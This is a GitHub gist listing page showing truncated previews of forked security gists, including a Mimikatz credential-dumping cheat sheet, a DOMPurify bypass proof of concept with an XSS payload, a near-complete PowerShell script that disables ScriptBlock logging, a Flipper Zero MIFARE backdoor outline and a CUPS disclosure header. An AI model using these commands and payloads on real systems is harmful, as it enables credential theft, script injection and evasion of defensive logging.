This is a work in progress by someone who is learning about Binary Ninja.
References
- https://api.binary.ninja/binaryninja.binaryview-module.html
- https://gist.github.com/psifertex/6fbc7532f536775194edd26290892ef7
Get database name
gavz
/ reboot_dlink_nas.py
Created
November 18, 2024 23:01
— forked from ronivaldo/reboot_dlink_nas.py
Dlink NAS 320L Restart
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from __future__ import print_function | |
| import requests | |
| import base64 | |
| # curl to python requests | |
| # https://curl.trillworks.com/ | |
| home_url = 'http://192.168.1.170/' | |
| session = requests.Session() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| LCG output... | |
| lcg(1) : 40B2947B | |
| lcg(2) : 73718F14 | |
| lcg(3) : 6203F04B | |
| lcg(4) : 1BB91A70 | |
| lcg(5) : 0CFC23E0 | |
| ICG output... | |
| icg(5) : 0CFC23E0 |
gavz
/ Mimikatz-cheatsheet
Created
October 19, 2024 20:32
— forked from insi2304/Mimikatz-cheatsheet
Mimikatz Cheat Sheet
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #general | |
| privilege::debug | |
| log | |
| log customlogfilename.log | |
| #sekurlsa | |
| sekurlsa::logonpasswords | |
| sekurlsa::logonPasswords full |
gavz
/ bn-cheat.md
Created
October 1, 2024 21:29
— forked from alexander-hanel/bn-cheat.md
Cheat Sheet for Binary Ninja
gavz
/ cups-browsed.md
Created
September 27, 2024 10:13
— forked from stong/cups-browsed.md
CUPS disclosure leaked online. Not my report. The original author is @evilsocket
Original report
- Affected Vendor: OpenPrinting
- Affected Product: Several components of the CUPS printing system: cups-browsed, libppd, libcupsfilters and cups-filters.
- Affected Version: All versions <= 2.0.1 (latest release) and master.
- Significant ICS/OT impact? no
- Reporter: Simone Margaritelli [[email protected]]
- Vendor contacted? yes The vendor has been notified trough Github Advisories and all bugs have been confirmed:
gavz
/ gist:e7bd406e17b6541f293b2d64979730c0
Created
August 17, 2024 22:36
— forked from dmaynor/gist:f1973ae244b5c2ed83d3b8e19f798f97
Mifare crypto backdoor flipper app
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Creating a Flipper Zero app to test for this attack involves writing a script that can interact with the RFID module on the Flipper Zero to perform the necessary steps. The Flipper Zero uses a scripting language called **.fap** (Flipper App) format, typically written in C or a high-level scripting language, but it also supports custom Python-like scripting with `flipperzero-tui`. | |
| Here's a basic outline for creating an app that can check for the presence of the backdoor key on a MIFARE Classic card. Note that this is a simplified version and assumes some familiarity with Flipper Zero's development environment. | |
| ### **Step 1: Set Up the Development Environment** | |
| 1. **Install Flipper Zero SDK:** | |
| - Follow the official [Flipper Zero documentation](https://github.com/flipperdevices/flipperzero-firmware) to set up the SDK and development environment. | |
| 2. **Clone the Flipper Zero Firmware:** |
gavz
/ app.js
Created
July 17, 2024 19:05
— forked from kevin-mizu/app.js
DOMPurify bypass using ISO-2022-JP
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const createDOMPurify = require("dompurify"); | |
| const { JSDOM } = require("jsdom"); | |
| const http = require("http"); | |
| const server = http.createServer((req, res) => { | |
| const window = new JSDOM("").window; | |
| const DOMPurify = createDOMPurify(window); | |
| const clean = DOMPurify.sanitize(`<a id="\x1b$B"></a>\x1b(B<a id="><img src=x onerror=alert(1)>"></a>`); | |
| res.statusCode = 200; |
gavz
/ arnold.md
Created
July 17, 2024 18:53
— forked from EvanMcBroom/arnold.md
IllBeBack - An Undocumented Function
Microsoft purchased the software Softricity SoftGrid in 2006 and renamed it to Microsoft Application Virtualization, or App-V for short. Windows shipped with several libraries in System32 and SysWOW64 to support App-V.
One App-V library stands out from all the rest because it only has one exported function named IllBeBack...
That's right!
A library signed by Microsoft, with Terminator in the name, that only has a single callable function named IllBeBack.
gavz
/ ScriptBlockLogBypass.ps1
Created
June 17, 2024 21:10
— forked from cobbr/ScriptBlockLogBypass.ps1
ScriptBlock Logging Bypass
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # ScriptBlock Logging Bypass | |
| # @cobbr_io | |
| $GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static') | |
| If ($GroupPolicyField) { | |
| $GroupPolicyCache = $GroupPolicyField.GetValue($null) | |
| If ($GroupPolicyCache['ScriptB'+'lockLogging']) { | |
| $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0 | |
| $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0 | |
| } |
gavz
/ CheckHvpt.c
Created
June 17, 2024 20:54
— forked from tandasat/CheckHvpt.c
C code to check HVPT availability
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <assert.h> | |
| #include <Windows.h> | |
| // Some of them taken (and modified) from https://github.com/winsiderss/systeminformer | |
| typedef struct _SYSTEM_ISOLATED_USER_MODE_INFORMATION | |
| { | |
| BOOLEAN SecureKernelRunning : 1; | |
| BOOLEAN HvciEnabled : 1; |
NewerOlder